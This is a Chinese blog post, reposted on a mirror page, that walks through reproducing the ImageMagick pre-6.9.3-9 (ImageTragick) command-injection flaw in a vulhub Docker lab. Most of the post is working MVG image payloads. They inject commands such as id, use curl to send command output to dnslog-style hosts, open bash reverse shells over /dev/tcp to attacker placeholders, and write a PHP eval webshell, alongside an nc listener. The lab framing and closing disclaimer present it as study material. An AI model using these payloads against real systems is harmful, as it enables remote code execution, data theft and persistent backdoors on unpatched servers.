zoukankan      html  css  js  c++  java
  • 漏洞复现-imagemagick:6.9.2-命令执行

     
     
     
     
     
     
     
     

    0x00 实验环境

    攻击机:Win 10

    靶场:docker拉的vulhub靶场

    0x01 影响版本

    对版本低于6.9.3.9ImageMagick有影响

    0x02 漏洞复现

    (1)新建一个图片,内容为:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|id")'
    pop graphic-context

    (2)id可更换为不同的命令,通过点击提交查询即可

     

    (3)靶机开启监听:

    nc -lvp 9999

    (5)尝试使用以下payload均未反弹shell成功:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|curl `id`.163.kempru.wyzxxz.cn")'
    pop graphic-context
     
    push graphic-context
    viewbox 0 0 640 480
    image Over 0,0 0,0 '|curl xxxxx.dnslog.link/?whoami=`whoami`'
    pop graphic-context
     
    push graphic-context
    viewbox 0 0 640 480
    image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
    pop graphic-context
     
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.net/2015 0>&1")'

    (4)由于环境限制,导致无法反弹shell,写shell也存在过滤,故不再过多演示,可参考https://www.cnblogs.com/cute-puli/p/15338017.html文章里的获取shell的方式:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|echo "<?php eval($_[pass]);"> /root/1.txt")'
    pop graphic-context

    0x03 免责声明

    本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关

  • 相关阅读:
    mysql for update 高并发 死锁研究
    IntelliJ IDEA导航特性Top20
    idea工具
    图片水印处理-temp
    idea常用快捷键列表
    编写MyLayer,2 锚点,3 精灵的创建,4 zorder
    CSS学习(十六)-HSLA颜色模式
    android中LocalBroadcastManager的使用
    什么是鸭子类型(duck typing)
    线程应用的场景
  • 原文地址:https://www.cnblogs.com/cute-puli/p/15234300.html
Copyright © 2011-2022 走看看